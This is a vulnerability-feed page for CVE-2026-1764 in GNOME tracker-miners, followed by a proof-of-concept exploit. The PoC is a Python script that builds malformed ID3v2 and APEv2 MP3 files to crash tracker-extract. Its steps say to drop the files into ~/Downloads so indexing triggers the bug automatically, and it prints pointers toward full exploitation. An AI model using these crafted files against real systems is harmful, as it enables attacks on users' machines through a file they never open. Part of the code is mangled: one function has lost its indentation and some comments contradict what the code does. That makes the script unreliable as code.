| Title | Published | Views | Reporter | Family All 34 |
|---|---|---|---|---|
| Amazon Linux 2023 : tracker-miners (ALAS2023-2026-1580) | 13 Apr 2026 00:00 | – | nessus | |
| Fedora 43 : localsearch (2026-ba6641558a) | 22 Mar 2026 00:00 | – | nessus | |
| openSUSE 16 Security Update : localsearch (openSUSE-SU-2026:20821-1) | 1 Jun 2026 00:00 | – | nessus | |
| SUSE SLED15 / SLES15 / openSUSE 15 Security Update : tracker-miners (SUSE-SU-2026:0780-1) | 5 Mar 2026 00:00 | – | nessus | |
| SUSE SLES16 Security Update : localsearch (SUSE-SU-2026:21854-1) | 2 Jun 2026 00:00 | – | nessus | |
| Ubuntu 22.04 LTS / 24.04 LTS / 25.10 : tracker-miners vulnerabilities (USN-8019-1) | 6 Feb 2026 00:00 | – | nessus | |
| Linux Distros Unpatched Vulnerability : CVE-2026-1764 | 3 Feb 2026 00:00 | – | nessus | |
| Low: tracker-miners | 13 Apr 2026 00:00 | – | amazon | |
| GNOME localsearch MP3 Extractor 安全漏洞 | 2 Feb 2026 00:00 | – | cnnvd | |
| CVE-2026-1764 | 2 Feb 2026 16:15 | – | cve | |
=============================================================================================================================================
| # Title : tracker-extract 3.8.2 tracker-miners 3.x Media Parser Crash PoC |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.ubuntu.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/215100/ & CVE-2026-1764
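[+] Summary : Crafted MP3/APEv2 tags may cause tracker-extract to crash when parsing oversized or malformed frames. The distribution advisories listed above for CVE-2026-1764 (e.g. USN-8019-1, SUSE-SU-2026:0780-1, ALAS2023-2026-1580) are the place to check for fixed tracker-miners/localsearch package versions.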
[+]PoC : id3_overflow.mp3, ape_overflow.mp3, hybrid.mp3
Place file in ~/Downloads
tracker-miners auto-indexes file
Observe crash with: journalctl -f | grep tracker
#!/usr/bin/env python3
import struct
import sys
import os
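class MP3ExploitGenerator:
    """Write malformed MP3 sample files for parser-robustness testing.

    Each ``create_*`` method writes one file whose tag or frame metadata is
    internally inconsistent: a declared size or count is far larger than the
    data that actually follows.  A metadata extractor handles such input
    safely only if it checks every declared length against the bytes still
    available before it allocates or reads.

    Attributes are documented inline; every ``create_*`` method returns
    ``True`` after the file has been written and records a label for it.
    """

    def __init__(self):
        # Labels of the sample files produced so far, in call order.
        self.techniques = []

    def create_id3v2_size_overflow(self, filename):
        """Write an ID3v2.3 tag whose declared sizes exceed the file length.

        The 10-byte tag header declares the largest sync-safe size and the
        single ``TIT2`` frame declares 0x3FFFFFFF bytes, yet only 1024 bytes
        of frame data are present (the file is 1044 bytes long).  A parser
        has to clamp both declared sizes to the remaining file length.

        Args:
            filename: Path of the file to create (overwritten if present).

        Returns:
            True once the file has been written.
        """
        declared_tag_size = 0x1FFFFFFF
        # Sync-safe encoding keeps 7 bits per byte, so only the low 28 bits
        # survive: the bytes written are 7F 7F 7F 7F (0x0FFFFFFF).
        sync_safe = bytes(
            (declared_tag_size >> shift) & 0x7F for shift in (21, 14, 7, 0)
        )
        declared_frame_size = 0x3FFFFFFF

        with open(filename, 'wb') as f:
            f.write(b'ID3')       # tag magic
            f.write(b'\x03\x00')  # version 2.3.0
            f.write(b'\x00')      # header flags
            f.write(sync_safe)
            f.write(b'TIT2')      # frame id
            f.write(struct.pack('>I', declared_frame_size))
            f.write(b'\x00\x00')  # frame flags
            f.write(b'A' * 1024)  # the only frame data actually present
        self.techniques.append("ID3v2 size overflow (premature EOF)")
        return True

    def create_mp3_bitrate_confusion(self, filename):
        """Write a truncated MPEG frame header followed by a ``Xing`` block.

        The file is 18 bytes: the two bytes ``FF FB``, the ASCII marker
        ``Xing``, the word 0x0000000F and two 0xFFFFFFFF words (in the Xing
        layout these positions hold the flags, frame count and byte count).
        Only the first two bytes of the frame header are written, so no
        bitrate or sample-rate index is actually encoded despite the label
        recorded for this sample; what it exercises is handling of a
        truncated header and of implausibly large Xing counters.

        Args:
            filename: Path of the file to create (overwritten if present).

        Returns:
            True once the file has been written.
        """
        # Bits 10-15 of 0xFFFB are already set, so forcing them to ones (as
        # the earlier version of this method did) left the value unchanged;
        # the constant is written directly and the unused lookup tables and
        # index variables are gone.
        header = 0xFFFB  # MPEG-1 Layer 3
        with open(filename, 'wb') as f:
            f.write(struct.pack('>H', header))
            f.write(b'Xing')
            f.write(struct.pack('>I', 0x0000000F))
            f.write(struct.pack('>I', 0xFFFFFFFF))
            f.write(struct.pack('>I', 0xFFFFFFFF))
        self.techniques.append("MP3 bitrate/sample rate confusion")
        return True

    def create_apev2_item_overflow(self, filename):
        """Write an APEv2 tag header that declares 0x40000000 items.

        After 4008 bytes of audio-like padding comes a 32-byte block:
        ``APETAGEX``, version 2000, tag size 1024, item count 0x40000000,
        flags 0x80000000 and eight reserved zero bytes.  Exactly one item
        (``Title``, 100 bytes of value) follows.  A parser that multiplies
        the declared item count by a per-item size, or loops over it, must
        bound the count by the declared tag size and the remaining bytes.

        Args:
            filename: Path of the file to create (overwritten if present).

        Returns:
            True once the file has been written.
        """
        item_size = 100
        item_flags = 0
        with open(filename, 'wb') as f:
            f.write(b'\xFF\xFB\x90\x64\x00\x00\x00\x00')
            f.write(b'\x00' * 4000)
            f.write(b'APETAGEX')
            f.write(struct.pack('<I', 2000))        # version
            f.write(struct.pack('<I', 1024))        # declared tag size
            f.write(struct.pack('<I', 0x40000000))  # declared item count
            f.write(struct.pack('<I', 0x80000000))  # tag flags
            f.write(b'\x00' * 8)                    # reserved
            f.write(struct.pack('<I', item_size))
            f.write(struct.pack('<I', item_flags))
            f.write(b'Title\x00')
            f.write(b'B' * item_size)
        self.techniques.append("APEv2 item count overflow")
        return True

    def create_hybrid_file(self, filename):
        """Write one file mixing ID3v2, frame-like and ID3v1-like sections.

        The ID3v2.3 header declares a 16-byte tag, but the ``COMM`` frame
        inside it declares 100 bytes, so the frame claims to extend past the
        tag.  Five 402-byte chunks follow, then a 129-byte ``TAG`` trailer
        (one byte longer than the 128-byte ID3v1 layout).

        Args:
            filename: Path of the file to create (overwritten if present).

        Returns:
            True once the file has been written.
        """
        with open(filename, 'wb') as f:
            f.write(b'ID3\x03\x00\x00')
            f.write(b'\x00\x00\x00\x10')     # declared tag size: 16
            f.write(b'COMM')
            f.write(struct.pack('>I', 100))  # declared frame size: 100
            f.write(b'\x80\x00')
            # NOTE(review): loop extent reconstructed from a listing without
            # indentation - confirm the trailer is meant to be written once,
            # after the loop.
            for i in range(5):
                bitrate_idx = (i % 14) + 1
                # The mask replaces the top four bits of the 16-bit value,
                # so the words written are 0x1FFB .. 0x5FFB and no longer
                # start with the FF sync byte.
                header = (0xFFFB & ~(0xF << 12)) | (bitrate_idx << 12)
                f.write(struct.pack('>H', header))
                f.write(b'\x00' * 400)
            f.write(b'TAG')
            f.write(b'A' * 125)
            f.write(b'\x00' * 1)
        self.techniques.append("Hybrid ID3v2/MP3/ID3v1 confusion")
        return True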
def test_with_tracker(filename):
"""Simulate how tracker-miners would process the file"""
print(f"\n[+] Simulating tracker-miners parsing of {filename}")
print(" (Based on tracker-extract 3.8.2 source analysis)")
file_size = os.path.getsize(filename)
print(f" File size: {file_size:,} bytes")
with open(filename, 'rb') as f:
header = f.read(10)
if header.startswith(b'ID3'):
print(" Starts with ID3v2 tag")
version = header[3]
print(f" ID3v2.{version}.0 detected")
size_bytes = header[6:10]
size = 0
for b in size_bytes:
size = (size << 7) | (b & 0x7F)
print(f" Tag size field: {size:,} bytes")
if size > 100 * 1024 * 1024: # 100MB
print(" Large size field - potential overflow")
elif header[:2] == b'\xFF\xFB' or header[:2] == b'\xFF\xFA':
print(" MPEG audio frame detected")
f.seek(-32, os.SEEK_END)
footer = f.read(32)
if b'APETAGEX' in footer:
print(" APEv2 tag detected at end")
def main():
    """Generate the four sample files and print a triage of each.

    Takes the output directory from ``sys.argv[1]`` (created if missing) and
    exits with status 1 after a usage line when it is absent.  For every
    sample the matching ``MP3ExploitGenerator`` method writes the file and
    ``test_with_tracker`` prints what its header and trailer contain; the
    labels collected by the generator and two fixed text banners are printed
    afterwards.  Nothing here runs tracker-extract itself.
    """
    argv = sys.argv
    if len(argv) < 2:
        print("Usage: python3 tracker_exploit.py <test_directory>")
        sys.exit(1)

    test_dir = argv[1]
    os.makedirs(test_dir, exist_ok=True)

    generator = MP3ExploitGenerator()
    # Insertion order of the dict is the order in which files are produced.
    builders = {
        "id3_overflow.mp3": generator.create_id3v2_size_overflow,
        "bitrate_confusion.mp3": generator.create_mp3_bitrate_confusion,
        "ape_overflow.mp3": generator.create_apev2_item_overflow,
        "hybrid.mp3": generator.create_hybrid_file,
    }
    for sample_name, build in builders.items():
        target = os.path.join(test_dir, sample_name)
        print(f"\n[+] Creating {sample_name}...")
        if not build(target):
            continue
        test_with_tracker(target)

    rule = "=" * 60
    print("\n" + rule)
    print("VULNERABILITY SUMMARY")
    print(rule)
    for number, label in enumerate(generator.techniques, 1):
        print(f"{number}. {label}")

    print("\n" + rule)
    print("REAL EXPLOIT CONSIDERATIONS")
    print(rule)
    print("""
1. Heap Feng Shui needed for reliable exploitation
2. GLib memory allocator (g_slice, g_malloc) specifics
3. tracker-miners uses GStreamer for parsing - check those code paths
4. ASLR bypass via info leaks (if any)
5. Need to control specific function pointers (GObject methods)
6. Potential sandbox/Seccomp restrictions
""")
    print("\n[+] Test files created in:", test_dir)
    for line in (
        "[!] For actual exploitation, reverse engineer:",
        " - tracker-extract binary",
        " - libtracker-extract.so",
        " - GStreamer plugins used",
    ):
        print(line)


if __name__ == "__main__":
    main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================